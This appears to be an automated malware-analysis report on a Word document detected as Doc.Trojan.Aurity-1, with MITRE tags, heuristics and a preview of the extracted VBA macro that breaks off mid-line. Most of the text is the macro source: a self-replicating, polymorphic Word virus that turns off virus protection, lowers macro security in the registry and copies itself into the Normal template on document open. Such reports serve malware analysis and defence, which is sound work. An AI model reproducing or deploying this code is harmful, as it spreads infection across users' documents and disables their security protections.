Verdict: MALICIOUS
Risk Score: 180

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample contains VBA macros, specifically a Document_Open macro designed to disable macro security settings. It attempts to write to registry keys 'HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Word\Security' and 'HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word\Security' to lower security levels. This is a common technique for macro-based malware to facilitate the execution of further malicious code.
Heuristics (3)
- ClamAV: Doc.Trojan.Aurity-1 (severity: critical, rule CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Aurity-1
- VBA macros detected (severity: medium, 1 related finding, rule OLE_VBA_MACROS): Document contains VBA macro code
- Document_Open macro (severity: high, rule OLE_VBA_DOCOPEN): Document_Open macro
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 | Detection | Obfuscation or payload |
|---|---|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5921 bytes | c91ac8724ec52fd4db7ec83a256ff23a85898d656b80a294230e75f8ce859c68 | ClamAV: Doc.Trojan.Aurity-1 | unlikely |
Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'Authority > ÌÒÖÑÌÑÈÈÊÙÒØÆßàÍÞÉÍ
Private Sub Document_Open()
    On Error Resume Next
    With Options
        .VirusProtection = False: .SaveNormalPrompt = False: .ConfirmConversions = False
    End With
    SoftwareKey = "HKEY_CURRENT_USER\Software\Microsoft\Office\"
    SecurityKey = Application.Version & "\Word\Security"
    OfficeKey = SoftwareKey & SecurityKey
    For CLoop = 0 To 1
        KeyArray = Array("Level", "AccessVBOM")
        System.PrivateProfileString("", OfficeKey, KeyArray(CLoop)) = 1&
    Next CLoop
    Set DocTT = ActiveDocument.VBProject.VBComponents(1).CodeModule
    Set DocNT = NormalTemplate.VBProject.VBComponents(1).CodeModule
    TTMarker = Left(DocTT.Lines(1, 1), 13)
    NTMarker = Left(DocNT.Lines(1, 1), 13)
    Randomize
    For RLoop = 1 To Int((30 * Rnd) + 1)
        Randomize
        If Int((2 * Rnd) + 1) = 1 Then
            RCase = 199
        Else
            RCase = 197
        End If
        Randomize
        R = R & Chr(Int((26 * Rnd) + RCase))
    Next
    If TTMarker <> "'Authority > " Then
        Do
            e = e + 1
            NTLines = NTLines & DocNT.Lines(e, 1) & vbCrLf
        Loop Until e = DocNT.CountOfLines
        DocTT.DeleteLines 1, DocTT.CountOfLines
        DocTT.InsertLines 1, Left(NTLines, Len(NTLines) - 2)
        DocTT.ReplaceLine 1, "'Authority > " & R
        DocTT.ReplaceLine 2, "Private Sub Document_Open()"
        TTC = True
    End If
    If NTMarker <> "'Authority > " Then
        Do
            C = C + 1
            TTLines = TTLines & DocTT.Lines(C, 1) & vbCrLf
        Loop Until C = DocTT.CountOfLines
        DocNT.DeleteLines 1, DocNT.CountOfLines
        DocNT.InsertLines 1, Left(TTLines, Len(TTLines) - 2)
        DocNT.ReplaceLine 1, "'Authority > " & R
        DocNT.ReplaceLine 2, "Private Sub Document_Close()"
        NTC = True
    End If
    If TTC = True Then
        Randomize
        If Int((2 * Rnd) + 1) = 1 Then
            C1 = 29: C2 = 30: C3 = 31: C4 = 32: C5 = 33: C6 = 34
            C7 = 35: C8 = 36: C9 = 37: C10 = 38: C11 = 39
            K1 = 40: K2 = 41: K3 = 42: K4 = 43: K5 = 44: K6 = 45
            K7 = 46: K8 = 47: K9 = 48: K10 = 49: K11 = 50
        Else
            C1 = 40: C2 = 41: C3 = 42: C4 = 43: C5 = 44: C6 = 45
            C7 = 46: C8 = 47: C9 = 48: C10 = 49: C11 = 50
            K1 = 29: K2 = 30: K3 = 31: K4 = 32: K5 = 33: K6 = 34
            K7 = 35: K8 = 36: K9 = 37: K10 = 38: K11 = 39
        End If
        With DocTT
            .ReplaceLine C1, "If TTMarker <> ""'Authority > "" Then"
            .ReplaceLine C2, "Do"
            .ReplaceLine C3, "e = e + 1"
            .ReplaceLine C4, "NTLines = NTLines & DocNT.Lines(e, 1) & vbCrLf"
            .ReplaceLine C5, "Loop Until e = DocNT.CountOfLines"
            .ReplaceLine C6, "DocTT.DeleteLines 1, DocTT.CountOfLines"
            .ReplaceLine C7, "DocTT.InsertLines 1, Left(NTLines, Len(NTLines) - 2)"
            .ReplaceLine C8, "DocTT.ReplaceLine 1, ""'Authority > "" & R"
            .ReplaceLine C9, "DocTT.ReplaceLine 2, ""Private Sub Document_Open()"""
            .ReplaceLine C10, "TTC = True"
            .ReplaceLine C11, "End If"
            .ReplaceLine K1, "If NTMarker <> ""'Authority > "" Then"
            .ReplaceLine K2, "Do"
            .ReplaceLine K3, "c = c + 1"
            .ReplaceLine K4, "TTLines = TTLines & DocTT.Lines(c, 1) & vbCrLf"
            .ReplaceLine K5, "Loop Until c = DocTT.CountOfLines"
            .ReplaceLine K6, "DocNT.DeleteLines 1, DocNT.CountOfLines"
            .ReplaceLine K7, "DocNT.InsertLines 1, Left(TTLines, Len(TTLines) - 2)"
            .ReplaceLine K8, "DocNT.ReplaceLine 1, ""'Authority > "" & R"
            .ReplaceLine K9, "DocNT.ReplaceLine 2, ""Private Sub Document_Close()"""
            .ReplaceLine K10, "NTC = True"
            .ReplaceLine K11, "End If"
        End With
        E1 = "VirusProtection"
        E2 = "SaveNormalPrompt"
        E3 = "ConfirmConversions"
        EF = " = False"
        EN = ": ."
        Randomize
        Select Case Int((6 * Rnd) + 1)
            Case 1: RL = Chr(46) & E1 & EF & EN & E2 & EF & EN & E3 & EF
            Case 2: RL = Chr(46) & E1 & EF & EN & E3 & EF & EN & E2 & EF
            Case 3: RL = Chr(46) & E2 & EF & EN & E1 & EF & EN & E3 & EF
            Case 4: RL = Chr(46) & E2 & EF & EN & E3 & EF & EN & E1 & EF
            Case 5: RL = Chr(46) & E3 & EF & EN & E1 & EF & EN & E2 & EF
            Case 6: RL = Chr(46) & E3 & EF & EN & E2 & EF & EN & E1 & EF
        End Select
        DocTT.ReplaceLine 5, RL
        RC1 = ".VBProject.VBComponents(1).CodeModule"
        RC2 = "Set
```

... (truncated)